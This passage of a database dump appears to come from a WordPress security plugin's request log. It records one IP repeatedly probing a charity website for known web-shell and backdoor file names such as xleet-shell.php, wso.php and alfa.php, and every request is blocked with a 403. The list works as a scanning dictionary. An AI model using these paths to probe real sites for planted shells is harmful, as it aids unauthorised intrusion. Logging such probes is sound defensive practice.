Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Jy4GYpAvH85tPaEzCbDksTUS',0,1674319558.5208,124,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/network/wp-footer.php?http://equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iMCYdt9cwIsz5HnUrjaNAT3G',0,1674319562.7297,128,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/upel.php?http://equalitywalk.org.uk/upel.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','C3l6821FY0jDsBIuvnwtqbmy',0,1674319567.5166,123,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/license.php?http://equalitywalk.org.uk/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8mW4FSsYXH9zgbPEqwedcRLU',0,1674319575.7718,154,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/098.php?http://equalitywalk.org.uk/098.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qDsbZutOc18gmaPEpUhylWw4',0,1674319580.6770,106,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/new_license.php?http://equalitywalk.org.uk/new_license.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7elxu0P1QGsTOtybgfjB8H9E',0,1674319582.9042,145,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/css/index.php?http://equalitywalk.org.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','F9N735iMDJZLo0EhcRXlQfrS',0,1674319591.5108,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/1975.phP?http://equalitywalk.org.uk/1975.phP','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9HhsTxp17kdKGZjJRON6zCu8',0,1674319593.0007,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/1975.php?http://equalitywalk.org.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','z0oH2d3xPaLiM6gfe8BG1VJY',0,1674319595.7686,133,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/radio.php?http://equalitywalk.org.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i92KROCQVpuj0tDZm1ca6eX7',0,1674319598.0114,200,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/wp-class.php?http://equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0fz2VKgjFaBW58Rb6XlHew3P',0,1674319600.8337,148,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xleet-shell.php?http://equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EzR0bDQm65tXHacydJTliMqu',0,1674319602.9565,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/radio.php?http://equalitywalk.org.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oxsl2W8SZcRzFV4IB1Ch6bN7',0,1674319608.5428,165,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/fx.php?http://equalitywalk.org.uk/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E7nFGOPRme8BbhpJNYx1X4UI',0,1674319610.5390,121,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/?http://equalitywalk.org.uk/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','h35UeSL1DtqQ49REO0rXCT7u',0,1674319614.3884,131,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/?http://equalitywalk.org.uk/////////////////////////////////////////','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4x5dJaeE2Hk7bzR901LUAvVp',0,1674319616.7874,95,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/images/atomlib.php?http://equalitywalk.org.uk/wp-admin/images/atomlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1uUtmlGa2qvsj350NyzQhPnY',0,1674319617.7878,143,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/gel4y.php?http://equalitywalk.org.uk/gel4y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pN1dXPf9eWlxDCv8UjnbgIAz',0,1674319619.2515,125,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/jindex.php?http://equalitywalk.org.uk/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','P1pTYuQ7hxF5tWz2fjVAaMS0',0,1674319620.9360,140,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/sh.php?http://equalitywalk.org.uk/sh.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QSLlHDi2U0czba5jZWKoyTr8',0,1674319625.7972,99,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/991176.php?http://equalitywalk.org.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JFOgSN0ljMQmz3PrxV5CbAiy',0,1674319629.1693,139,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/maint/about.php?http://equalitywalk.org.uk/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TNB0LHMpOnjvJszZPlgad3KR',0,1674319632.0762,166,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/fox.php?http://equalitywalk.org.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Q8ulMYksX16hrfaAcvTGLjPo',0,1674319634.2996,138,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/x.php?http://equalitywalk.org.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dtMsjEvgHAcK87TVf5irPWFR',0,1674319638.0378,127,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/fw.ph?http://equalitywalk.org.uk/fw.ph','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tPMpWAU1r65mDoV7E384KqhN',0,1674319639.9502,130,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/server.php?http://equalitywalk.org.uk/server.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4xzMg3DlR7qVhiopLv8uePkA',0,1674319641.8956,125,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/fw.php?http://equalitywalk.org.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lZnTva1MAJrQK0qiEPcoBx7z',0,1674319643.5625,132,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/4.php?http://equalitywalk.org.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jS7PknFZuEW6NVGzRiHIl0Ae',0,1674319647.7963,116,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/5.php?http://equalitywalk.org.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HMzZ6lGywR01PShLC2Tu4gk9',0,1674319650.5221,155,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/images/about.php?http://equalitywalk.org.uk/images/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Y0jSRWQsqvg83dxz4XBAnGZu',0,1674319652.5136,118,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/xmlrpc.php?http://equalitywalk.org.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sCc6MwSnghKrLNbAPYTGzDQf',0,1674319655.1056,150,'','GET',403,0,515,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-load.php?http://equalitywalk.org.uk/wp-load.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iudQSEkJRGK2PyxpY78qFnC4',0,1674319656.8112,100,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/fw.php?http://equalitywalk.org.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V0po9SyihnXFD8CqKvLWZ3YQ',0,1674319661.1602,94,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/mari.php?http://equalitywalk.org.uk/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','q7vX8IfYndUxEiPumCp6HOkK',0,1674319663.3193,98,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/swm.php?http://equalitywalk.org.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MOIm4c1N7xfKR5WhJGqeHugX',0,1674319665.6543,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/radio.php?http://equalitywalk.org.uk/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PgmfpRjZJG9UOXN6VHSW1vbc',0,1674319667.2650,153,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/about.php?http://equalitywalk.org.uk/wp-includes/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ms412ASlg3yGntpOCFoYfhvH',0,1674319669.2128,138,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/wso.php?http://equalitywalk.org.uk/wp-admin/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oh7jct80WNv9iTuCr6MOwQKs',0,1674319676.9178,105,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/w3llstore.php?http://equalitywalk.org.uk/w3llstore.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aU3FPTxWR8VDeziCd42JwqYG',0,1674319679.6399,150,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/alfa.php?http://equalitywalk.org.uk/wp-admin/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CFvgTZk9i2G4PSN1QXyrOUeR',0,1674319687.1238,162,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/gank.php.PhP?http://equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Atbnvik9RX2E6wlKJ7Z3SqY4',0,1674319689.0974,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/style.php?http://equalitywalk.org.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xAN0L34TrJ8KpeOfSawIBk1D',0,1674319692.2476,116,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/s_e.php?http://equalitywalk.org.uk/s_e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jxbCBMRy5l301wUQPIpZ2NTO',0,1674319694.0496,117,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/s_ne.php?http://equalitywalk.org.uk/s_ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OXRCA3Jk92tgqdFGSHQTVi08',0,1674319696.8458,95,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/beence.php?http://equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZnTgAG0YXhSlksyIq1Qc48H2',0,1674319698.4912,138,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-signin.php?http://equalitywalk.org.uk/wp-signin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZXBT3gFeMRaLlP2rDiAoqSW0',0,1674319701.2987,132,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/moduless.php?http://equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0dabvtNRGFKyOqx2pzcwji3f',0,1674319705.0719,96,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/export.php?http://equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HWrG3LBbeI0NkmlT1x9K5f7A',0,1674319707.4169,94,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/legion.php?http://equalitywalk.org.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','C2ytFduG4UqBR9zYPpLlOm6k',0,1674319710.4784,94,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/system_log.php?http://equalitywalk.org.uk/system_log.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mU3KhjS2xqcJt0MQL7ewYgby',0,1674319712.8493,100,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/shells.php?http://equalitywalk.org.uk/shells.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jwQle5af9UmsFgtKrBPRd2ik',0,1674319716.1158,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/wp-atom.php?http://equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WPRmQ4ey6U2KYBpb9auAdghE',0,1674319719.3612,89,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/images/css.php?http://equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zHGpdbauP8CmSyQDqvwZXLYI',0,1674319732.7791,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/css/css.php?http://equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZuUmEMqVYF3XGIJKa84wgeOi',0,1674319735.9105,99,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-beckup.php?http://equalitywalk.org.uk/wp-beckup.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','I6DZosAmHYJ1pB37EMgiN5Pk',0,1674319742.4764,104,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-blog-post.php?http://equalitywalk.org.uk/wp-blog-post.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0NthQLjHe4prmFDsJBP8zGXy',0,1674319744.5217,155,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/includes/class-wp-media-list-data.php?http://equalitywalk.org.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4B1oQpCws63mcDgdOitZUxNE',0,1674319750.8588,106,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/style.php?http://equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gCSZwlTf2Yn1U4RDcQVJtBO7',0,1674319755.3057,126,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/6.php?http://equalitywalk.org.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PsunxzrNqyajOoK906keGgwC',0,1674319759.2572,112,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/7.php?http://equalitywalk.org.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ExidScCOAj2kwJo6NQqa0yKB',0,1674319762.4609,138,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/8.php?http://equalitywalk.org.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kBF7dvb5MOqyzaHQpXK0ihTD',0,1674319765.6074,110,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/9.php?http://equalitywalk.org.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Uu4fpMitlX71QW9y8DYgqkJK',0,1674319767.8741,148,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/10.php?http://equalitywalk.org.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UgkrfY89QKqm6tC5oyaxLWXO',0,1674319771.3042,102,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp_class_datalib.php?http://equalitywalk.org.uk/wp_class_datalib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Coamk8ydVcHMPrj5xNOXF0BK',0,1674319773.6706,147,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/wp_class_datlib.php?http://equalitywalk.org.uk/wp-includes/wp_class_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','su3NxX91k7acoFIdQlwORZLM',0,1674319775.7131,167,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-includes/pomo/wp_class_datalib.php?http://equalitywalk.org.uk/wp-includes/pomo/wp_class_datalib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JcS2sq7U6jEBPCpZA5GQeXhH',0,1674319779.2029,97,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/01.php?http://equalitywalk.org.uk/01.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LVaHogC7jen0tdORc4PZ6EKl',0,1674319783.4915,128,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/marijuana.php?http://equalitywalk.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','snaUFjlqJcSMT6L1zpbXPixH',0,1674319785.7990,112,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/1xleet.php?http://equalitywalk.org.uk/1xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FMbvEZwKYO5eRAmtxgPlBC7y',0,1674319790.4981,117,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/shell.php?http://equalitywalk.org.uk/wp-admin/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XgnBeVQaD4kjY3SLKorfvh1G',0,1674319798.1200,108,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-admin/wp.php?http://equalitywalk.org.uk/wp-admin/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4L3g0V5PMdpt1AHDTImskebX',0,1674319801.1604,151,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/4index.php?http://equalitywalk.org.uk/4index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 